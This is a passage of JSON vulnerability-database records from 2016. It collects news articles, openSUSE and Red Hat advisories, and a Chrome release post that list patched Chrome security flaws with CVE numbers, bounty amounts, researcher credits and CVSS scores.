Windows, Mac, and Linux fixes those security issues. It also introduces a number of new features to the browser to enhance the way it handles panning gestures and to support CSS automatic hyphenation.\n\nThe United States Computer Emergency Readiness Team (US-CERT) issued an alert around [the Chrome update](<https://www.us-cert.gov/ncas/current-activity/2016/12/01/Google-Releases-Security-Updates-Chrome>) on Thursday in conjunction with Google, [detailing a list of 26 bug bounty payments](<https://googlechromereleases.blogspot.com/2016/12/stable-channel-update-for-desktop.html>) totaling $70,000 paid to external researchers. According to Google, another 10 security fixes were tackled by Google itself.\n\nTopping the list of vulnerabilities are a dozen \u201chigh\u201d severity issues. Five of the flaws are tied to universal cross-site scripting vulnerabilities in Chrome\u2019s Blink component, a web browser engine developed as part of the open-source web browser project Chromium Project.\n\nSecurity researcher Mariusz Mlynski earned $22,500 for finding three of the high-severity bugs tied to cross site scripting errors in Blink. The Polish researcher found similar flaws in May, earning him [$15,000](<https://threatpost.com/researcher-pockets-30000-in-chrome-bounties/118337/>).\n\nFour other high-severity vulnerabilities are tied to Google\u2019s problem-plagued Chrome default PDF viewer, called PDFium. The flaw, [described by Google in June](<https://threatpost.com/google-patches-high-severity-browser-pdf-vulnerability/118580/>), had put users at risk if they were enticed to view a specially crafted PDF document with an embedded jpeg2000 image within the default PDF viewer. Google did not disclose specifics of this most recent PDFium vulnerability in Thursday\u2019s update.\n\nTwo more high-severity vulnerabilities are tied to Chrome\u2019s V8 JavaScript engine. One of the flaws is described as a \u201cprivate property access in V8\u201d vulnerability. The other V8 issue is a use after free vulnerability in V8. There were nine reported medium-severity flaws, two of which are related to Chrome\u2019s Omnibox (address bar) which hackers in the past have been able to use to spoof addresses.\n\nThe high and medium-severity bugs that earned bounties are:\n\n[$N/A]** High **CVE-2016-9651: Private property access in V8. _Credit to Guang Gong of Alpha Team Of Qihoo 360_\n\n[$7,500]** High **CVE-2016-5208: Universal XSS in Blink. _Credit to Mariusz Mlynski_\n\n[$7,500]** High **CVE-2016-5207: Universal XSS in Blink. _Credit to Mariusz Mlynski_\n\n[$7,500]** High **CVE-2016-5206: Same-origin bypass in PDFium. _Credit to Rob Wu _\n\n[$7,500]** High **CVE-2016-5205: Universal XSS in Blink. _Credit to Anonymous_\n\n[$7,500]** High **CVE-2016-5204: Universal XSS in Blink. _Credit to Mariusz Mlynski_\n\n[$5,000]** High **CVE-2016-5209: Out of bounds write in Blink. _Credit to Giwan Go of STEALIEN_\n\n[$3,000]** High **CVE-2016-5203: Use after free in PDFium. _Credit to Anonymous_\n\n[$3,500]** High **CVE-2016-5210: Out of bounds write in PDFium. _Credit to Ke Liu of Tencent\u2019s Xuanwu LAB_\n\n[$3,000]** High **CVE-2016-5212: Local file disclosure in DevTools. _Credit to Khalil Zhani_\n\n[$3,000]** High **CVE-2016-5211: Use after free in PDFium. _Credit to Anonymous_\n\n[$500]** High **CVE-2016-5213: Use after free in V8. _Credit to Khalil Zhani_\n\n[$N/A]** Medium **CVE-2016-5214: File download protection bypass. _Credit to Jonathan Birch and MSVR_\n\n[$3,000]** Medium **CVE-2016-5216: Use after free in PDFium. _Credit to Anonymous_\n\n[$3,000]** Medium **CVE-2016-5215: Use after free in Webaudio. _Credit to Looben Yang_\n\n[$2,500]** Medium **CVE-2016-5217: Use of unvalidated data in PDFium. _Credit to Rob Wu _\n\n[$2,000]** Medium **CVE-2016-5218: Address spoofing in Omnibox. _Credit to Abdulrahman Alqabandi (@qab)_\n\n[$1,500]** Medium **CVE-2016-5219: Use after free in V8. _Credit to Rob Wu _\n\n[$1,000]** Medium **CVE-2016-5221: Integer overflow in ANGLE. _Credit to Tim Becker of ForAllSecure_\n\n[$1,000]** Medium **CVE-2016-5220: Local file access in PDFium. _Credit to Rob Wu _\n\n[$500]** Medium **CVE-2016-5222: Address spoofing in Omnibox. _Credit to xisigr of Tencent\u2019s Xuanwu Lab_\n", "cvss3": {}, "published": "2016-12-02T11:45:07", "type": "threatpost", "title": "Google Fixes 12 High-Severity Vulnerabilities In Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-9651"], "modified": "2016-12-08T22:46:33", "id": "THREATPOST:8824503BC1A2C5007509D80EDDF5E01C", "href": "https://threatpost.com/google-fixes-12-high-severity-flaws-in-chrome-browser/122223/", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:54:36", "description": "Google on Wednesday patched 21 security vulnerabilities in Chrome, including a half dozen rated high severity that were reported by external researchers and were eligible for a bounty.\n\nBug hunters earned a total of $30,000 in bounties, with a top payout of $7,500 to an unnamed researcher for a universal cross-site scripting flaw found in Blink, the Chrome browser engine.\n\nThe Chrome 54 update (54.0.2840.59) applies to the Windows, Mac, and Linux versions of the browser. Google said [in its security bulletin](<https://googlechromereleases.blogspot.com/2016/10/stable-channel-update-for-desktop.html>) the updates will roll out over the next days and weeks to Chrome browsers.\n\nGoogle hasn\u2019t revealed many details on the vulnerabilities discovered. The universal XSS bug (CVE-2016-5181) in Blink was one of several vulnerabilities that impacted the browser engine. A second heap overflow bug (CVE-2016-5182) in Blink was reported by a researcher Giwan Go of Korean security company Stealien.\n\nA third Blink vulnerability (CVE-2016-5185) was identified by the prolific bug hunter that goes by the handle cloudfuzzer, who earned a $3,000 reward. This use-after-free flaw allows hackers to execute arbitrary code or crash programs by utilizing system memory that has been temporarily freed.\n\nGoogle patched two vulnerabilities tied to its problem-plagued Chrome default PDF viewer, called PDFium. According to Google, researchers found two high-rated vulnerabilities that are both use-after-free bugs (CVE-2016-5184 and CVE-2016-5183) tied to PDFium. Google has had to fix the PDFium component in its browser several times this year, [including in June when it patched](<https://threatpost.com/google-patches-high-severity-browser-pdf-vulnerability/118580/>) a bug that allowed attackers to execute code on targeted systems via a specially crafted PDF document with an embedded jpeg2000 image.\n\nA fifth high-severity bug was identified by researcher Luan Herrera who found a URL spoofing vulnerability (CVE-2016-5187). The researcher had found a previous medium-severity [vulnerability in April](<https://threatpost.com/latest-chrome-update-addresses-two-high-severity-vulnerabilities/117400/>). Herrera earned $1,000 for this most recent find. Herrera earned an additional $3,134 for finding a medium-severity UI spoofing bug (CVE-2016-5188) that can cause a user to mistake content for a Chrome browser element such as a location or status bar.\n\nFollowing is a complete list of other vulnerabilities that earned rewards:\n\n[$1,000] [[633885](<https://crbug.com/633885>)] Medium CVE-2016-5192: Cross-origin bypass in Blink. _Credit to haojunhou [at] gmail.com_\n\n[$500] [[646278](<https://crbug.com/646278>)] Medium CVE-2016-5189: URL spoofing. _Credit to xisigr of Tencent\u2019s Xuanwu Lab_\n\n[$500] [[644963](<https://crbug.com/644963>)] Medium CVE-2016-5186: Out of bounds read in DevTools. _Credit to Abdulrahman Alqabandi (@qab)_\n\n[$500] [[639126](<https://crbug.com/639126>)] Medium CVE-2016-5191: Universal XSS in Bookmarks. _Credit to Gareth Hughes_\n\n[$N/A] [[642067](<https://crbug.com/642067>)] Medium CVE-2016-5190: Use after free in Internals. _Credit to Atte Kettunen of OUSPG_\n\n[$500] [[639658](<https://crbug.com/639658>)] Low CVE-2016-5193: Scheme bypass. _Credit to Yuyang ZHOU (martinzhou96)_\n", "cvss3": {}, "published": "2016-10-13T14:54:38", "type": "threatpost", "title": "Google Plugs 21 Security Holes in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193"], "modified": "2016-10-21T15:45:12", "id": "THREATPOST:0B82F0050CB73CDB74D96D4EB0C2E303", "href": "https://threatpost.com/google-plugs-21-security-holes-in-chrome/121289/", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2017-02-27T11:11:33", "description": "This update to Chromium 55.0.2883.75 fixes the following vulnerabilities:\n\n - CVE-2016-9651: Private property access in V8\n - CVE-2016-5208: Universal XSS in Blink\n - CVE-2016-5207: Universal XSS in Blink\n - CVE-2016-5206: Same-origin bypass in PDFium\n - CVE-2016-5205: Universal XSS in Blink\n - CVE-2016-5204: Universal XSS in Blink\n - CVE-2016-5209: Out of bounds write in Blink\n - CVE-2016-5203: Use after free in PDFium\n - CVE-2016-5210: Out of bounds write in PDFium\n - CVE-2016-5212: Local file disclosure in DevTools\n - CVE-2016-5211: Use after free in PDFium\n - CVE-2016-5213: Use after free in V8\n - CVE-2016-5214: File download protection bypass\n - CVE-2016-5216: Use after free in PDFium\n - CVE-2016-5215: Use after free in Webaudio\n - CVE-2016-5217: Use of unvalidated data in PDFium\n - CVE-2016-5218: Address spoofing in Omnibox\n - CVE-2016-5219: Use after free in V8\n - CVE-2016-5221: Integer overflow in ANGLE\n - CVE-2016-5220: Local file access in PDFium\n - CVE-2016-5222: Address spoofing in Omnibox\n - CVE-2016-9650: CSP Referrer disclosure\n - CVE-2016-5223: Integer overflow in PDFium\n - CVE-2016-5226: Limited XSS in Blink\n - CVE-2016-5225: CSP bypass in Blink\n - CVE-2016-5224: Same-origin bypass in SVG\n - CVE-2016-9652: Various fixes from internal audits, fuzzing and other\n initiatives\n\n The default bookmarks override was removed.\n\n The following packaging changes are included:\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg, where available.\n - Chromium now requires harfbuzz >= 1.3.0\n\n", "cvss3": {}, "published": "2017-02-27T12:08:25", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5204", "CVE-2016-5226"], "modified": "2017-02-27T12:08:25", "id": "OPENSUSE-SU-2017:0563-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00042.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-13T14:02:36", "description": "This update to Chromium 55.0.2883.75 fixes the following vulnerabilities:\n\n - CVE-2016-9651: Private property access in V8\n - CVE-2016-5208: Universal XSS in Blink\n - CVE-2016-5207: Universal XSS in Blink\n - CVE-2016-5206: Same-origin bypass in PDFium\n - CVE-2016-5205: Universal XSS in Blink\n - CVE-2016-5204: Universal XSS in Blink\n - CVE-2016-5209: Out of bounds write in Blink\n - CVE-2016-5203: Use after free in PDFium\n - CVE-2016-5210: Out of bounds write in PDFium\n - CVE-2016-5212: Local file disclosure in DevTools\n - CVE-2016-5211: Use after free in PDFium\n - CVE-2016-5213: Use after free in V8\n - CVE-2016-5214: File download protection bypass\n - CVE-2016-5216: Use after free in PDFium\n - CVE-2016-5215: Use after free in Webaudio\n - CVE-2016-5217: Use of unvalidated data in PDFium\n - CVE-2016-5218: Address spoofing in Omnibox\n - CVE-2016-5219: Use after free in V8\n - CVE-2016-5221: Integer overflow in ANGLE\n - CVE-2016-5220: Local file access in PDFium\n - CVE-2016-5222: Address spoofing in Omnibox\n - CVE-2016-9650: CSP Referrer disclosure\n - CVE-2016-5223: Integer overflow in PDFium\n - CVE-2016-5226: Limited XSS in Blink\n - CVE-2016-5225: CSP bypass in Blink\n - CVE-2016-5224: Same-origin bypass in SVG\n - CVE-2016-9652: Various fixes from internal audits, fuzzing and other\n initiatives\n\n The default bookmarks override was removed.\n\n The following packaging changes are included:\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg, where available.\n - Chromium now requires harfbuzz >= 1.3.0\n\n", "cvss3": {}, "published": "2016-12-13T13:10:29", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5204", "CVE-2016-5226"], "modified": "2016-12-13T13:10:29", "id": "OPENSUSE-SU-2016:3108-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00050.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-11-15T05:28:34", "description": "This update to Chromium 54.0.2840.100 fixes the following vulnerabilities:\n\n - CVE-2016-5199: Heap corruption in FFmpeg (boo#1009892)\n - CVE-2016-5200: out of bounds memory access in v8 (boo#1009893)\n - CVE-2016-5201: info leak in extensions (boo#1009894)\n - CVE-2016-5202: various fixes from internal audits (boo#1009895)\n\n", "cvss3": {}, "published": "2016-11-15T03:07:35", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5202", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5201"], "modified": "2016-11-15T03:07:35", "id": "OPENSUSE-SU-2016:2792-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-11/msg00028.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-11-15T05:28:34", "description": "This update to Chromium 54.0.2840.100 fixes the following vulnerabilities:\n\n - CVE-2016-5199: Heap corruption in FFmpeg (boo#1009892)\n - CVE-2016-5200: out of bounds memory access in v8 (boo#1009893)\n - CVE-2016-5201: info leak in extensions (boo#1009894)\n - CVE-2016-5202: various fixes from internal audits (boo#1009895)\n\n", "cvss3": {}, "published": "2016-11-15T03:08:19", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5202", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5201"], "modified": "2016-11-15T03:08:19", "id": "OPENSUSE-SU-2016:2793-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-11/msg00029.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-23T21:27:52", "description": "Chromium was updated to 54.0.2840.59 to fix security issues and bugs.\n\n The following security issues are fixed (bnc#1004465):\n\n - CVE-2016-5181: Universal XSS in Blink\n - CVE-2016-5182: Heap overflow in Blink\n - CVE-2016-5183: Use after free in PDFium\n - CVE-2016-5184: Use after free in PDFium\n - CVE-2016-5185: Use after free in Blink\n - CVE-2016-5187: URL spoofing\n - CVE-2016-5188: UI spoofing\n - CVE-2016-5192: Cross-origin bypass in Blink\n - CVE-2016-5189: URL spoofing\n - CVE-2016-5186: Out of bounds read in DevTools\n - CVE-2016-5191: Universal XSS in Bookmarks\n - CVE-2016-5190: Use after free in Internals\n - CVE-2016-5193: Scheme bypass\n\n The following bugs were fixed:\n\n - bnc#1000019: display issues in full screen mode, add\n --ui-disable-partial-swap to the launcher\n\n The following packaging changes are included:\n\n - The desktop sub-packages are no obsolete\n - The package now uses the system variants of some bundled libraries\n - The hangouts extension is now built\n\n", "cvss3": {}, "published": "2016-10-23T21:08:41", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5183", "CVE-2016-5182", "CVE-2016-5191", "CVE-2016-5186", "CVE-2016-5184", "CVE-2016-5189", "CVE-2016-5185", "CVE-2016-5193", "CVE-2016-5190", "CVE-2016-5181", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5187"], "modified": "2016-10-23T21:08:41", "id": "SUSE-SU-2016:2598-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00042.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-23T21:27:52", "description": "Chromium was updated to 54.0.2840.59 to fix security issues and bugs.\n\n The following security issues are fixed (bnc#1004465):\n\n - CVE-2016-5181: Universal XSS in Blink\n - CVE-2016-5182: Heap overflow in Blink\n - CVE-2016-5183: Use after free in PDFium\n - CVE-2016-5184: Use after free in PDFium\n - CVE-2016-5185: Use after free in Blink\n - CVE-2016-5187: URL spoofing\n - CVE-2016-5188: UI spoofing\n - CVE-2016-5192: Cross-origin bypass in Blink\n - CVE-2016-5189: URL spoofing\n - CVE-2016-5186: Out of bounds read in DevTools\n - CVE-2016-5191: Universal XSS in Bookmarks\n - CVE-2016-5190: Use after free in Internals\n - CVE-2016-5193: Scheme bypass\n\n The following bugs were fixed:\n\n - bnc#1000019: display issues in full screen mode, add\n --ui-disable-partial-swap to the launcher\n\n The following packaging changes are included:\n\n - The desktop sub-packages are no obsolete\n - The package now uses the system variants of some bundled libraries\n - The hangouts extension is now built\n\n", "cvss3": {}, "published": "2016-10-23T21:08:09", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5183", "CVE-2016-5182", "CVE-2016-5191", "CVE-2016-5186", "CVE-2016-5184", "CVE-2016-5189", "CVE-2016-5185", "CVE-2016-5193", "CVE-2016-5190", "CVE-2016-5181", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5187"], "modified": "2016-10-23T21:08:09", "id": "OPENSUSE-SU-2016:2597-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00041.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2021-10-19T20:38:44", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 55.0.2883.75.\n\nSecurity Fix(es):\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2016-5203, CVE-2016-5204, CVE-2016-5205, CVE-2016-5206, CVE-2016-5207, CVE-2016-5208, CVE-2016-5209, CVE-2016-5210, CVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-9651, CVE-2016-9652, CVE-2016-5214, CVE-2016-5215, CVE-2016-5216, CVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5220, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226, CVE-2016-9650)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-07T18:07:15", "type": "redhat", "title": "(RHSA-2016:2919) Important: chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2018-06-07T05:04:29", "id": "RHSA-2016:2919", "href": "https://access.redhat.com/errata/RHSA-2016:2919", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:35:40", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 54.0.2840.100.\n\nSecurity Fix(es):\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2016-5199, CVE-2016-5200, CVE-2016-5202, CVE-2016-5201)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2016-11-14T18:41:32", "type": "redhat", "title": "(RHSA-2016:2718) Important: chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2018-06-07T05:04:32", "id": "RHSA-2016:2718", "href": "https://access.redhat.com/errata/RHSA-2016:2718", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "chrome": [{"lastseen": "2021-12-30T22:33:31", "description": "The Chrome team is delighted to announce the promotion of Chrome 55 to the stable channel for Windows, Mac and Linux. This will roll out over the coming days/weeks. \n\n\n\n\n\n\nChrome 55.0.2883.75 contains a number of fixes and improvements -- a list of changes is available in the[ log](<https://chromium.googlesource.com/chromium/src/+log/54.0.2840.98..55.0.2883.75?pretty=fuller&n=10000>). Watch out for upcoming[ Chrome](<http://chrome.blogspot.com/>) and[ Chromium](<http://blog.chromium.org/>) blog posts about new features and big efforts delivered in 55.\n\nSecurity Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [36](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=label%3ARelease-0-M55>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$N/A][[664411](<https://crbug.com/664411>)] High CVE-2016-9651: Private property access in V8. Credit to Guang Gong of Alpha Team Of Qihoo 360 reported through Pwnfest\n\n[$7500][[658535](<https://crbug.com/658535>)] High CVE-2016-5208: Universal XSS in Blink. Credit to Mariusz Mlynski\n\n[$7500][[655904](<https://crbug.com/655904>)] High CVE-2016-5207: Universal XSS in Blink. Credit to Mariusz Mlynski\n\n[$7500][[653749](<https://crbug.com/653749>)] High CVE-2016-5206: Same-origin bypass in PDFium. Credit to Rob Wu ([robwu.nl](<https://robwu.nl/>))\n\n[$7500][[646610](<https://crbug.com/646610>)] High CVE-2016-5205: Universal XSS in Blink. Credit to Anonymous\n\n[$7500][[630870](<https://crbug.com/630870>)] High CVE-2016-5204: Universal XSS in Blink. Credit to Mariusz Mlynski\n\n[$5000][[664139](<https://crbug.com/664139>)] High CVE-2016-5209: Out of bounds write in Blink. Credit to Giwan Go of STEALIEN\n\n[$3000][[644219](<https://crbug.com/644219>)] High CVE-2016-5203: Use after free in PDFium. Credit to Anonymous\n\n[$3500][[654183](<https://crbug.com/654183>)] High CVE-2016-5210: Out of bounds write in PDFium. Credit to Ke Liu of Tencent's Xuanwu LAB\n\n[$3000][[653134](<https://crbug.com/653134>)] High CVE-2016-5212: Local file disclosure in DevTools. Credit to Khalil Zhani\n\n[$3000][[649229](<https://crbug.com/649229>)] High CVE-2016-5211: Use after free in PDFium. Credit to Anonymous\n\n[$500][[652548](<https://crbug.com/652548>)] High CVE-2016-5213: Use after free in V8. Credit to Khalil Zhani\n\n[$N/A][[601538](<https://crbug.com/601538>)] Medium CVE-2016-5214: File download protection bypass. Credit to Jonathan Birch and MSVR\n\n[$3000][[653090](<https://crbug.com/653090>)] Medium CVE-2016-5216: Use after free in PDFium. Credit to Anonymous\n\n[$3000][[619463](<https://crbug.com/619463>)] Medium CVE-2016-5215: Use after free in Webaudio. Credit to Looben Yang\n\n[$2500][[654280](<https://crbug.com/654280>)] Medium CVE-2016-5217: Use of unvalidated data in PDFium. Credit to Rob Wu ([robwu.nl](<https://robwu.nl/>))\n\n[$2000][[660498](<https://crbug.com/660498>)] Medium CVE-2016-5218: Address spoofing in Omnibox. Credit to Abdulrahman Alqabandi (@qab)\n\n[$1500][[657568](<https://crbug.com/657568>)] Medium CVE-2016-5219: Use after free in V8. Credit to Rob Wu ([robwu.nl](<https://robwu.nl/>))\n\n[$1000][[660854](<https://crbug.com/660854>)] Medium CVE-2016-5221: Integer overflow in ANGLE. Credit to Tim Becker of ForAllSecure\n\n[$1000][[654279](<https://crbug.com/654279>)] Medium CVE-2016-5220: Local file access in PDFium. Credit to Rob Wu ([robwu.nl](<https://robwu.nl/>))\n\n[$500][[657720](<https://crbug.com/657720>)] Medium CVE-2016-5222: Address spoofing in Omnibox. Credit to xisigr of Tencent's Xuanwu Lab\n\n[$N/A][[653034](<https://crbug.com/653034>)] Low CVE-2016-9650: CSP Referrer disclosure. Credit to Jakub \u017boczek\n\n[$N/A][[652038](<https://crbug.com/652038>)] Low CVE-2016-5223: Integer overflow in PDFium. Credit to Hwiwon Lee \n[$N/A][[639750](<https://crbug.com/639750>)] Low CVE-2016-5226: Limited XSS in Blink. Credit to Jun Kokatsu (@shhnjk)\n\n[$N/A][[630332](<https://crbug.com/630332>)] Low CVE-2016-5225: CSP bypass in Blink. Credit to Scott Helme (@Scott_Helme, [scotthelme.co.uk](<https://scotthelme.co.uk/>))\n\n[$N/A][[615851](<https://crbug.com/615851>)] Low CVE-2016-5224: Same-origin bypass in SVG. Credit to Roeland Krak\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\n\n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[669928](<https://bugs.chromium.org/p/chromium/issues/detail?id=669928>)] CVE-2016-9652: Various fixes from internal audits, fuzzing and other initiatives\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), or [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>).\n\n\n\n\n\n\n\nInterested in switching release channels?[ Find out how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by[ filing a bug](<http://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\n\n\n\nKrishna Govind\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 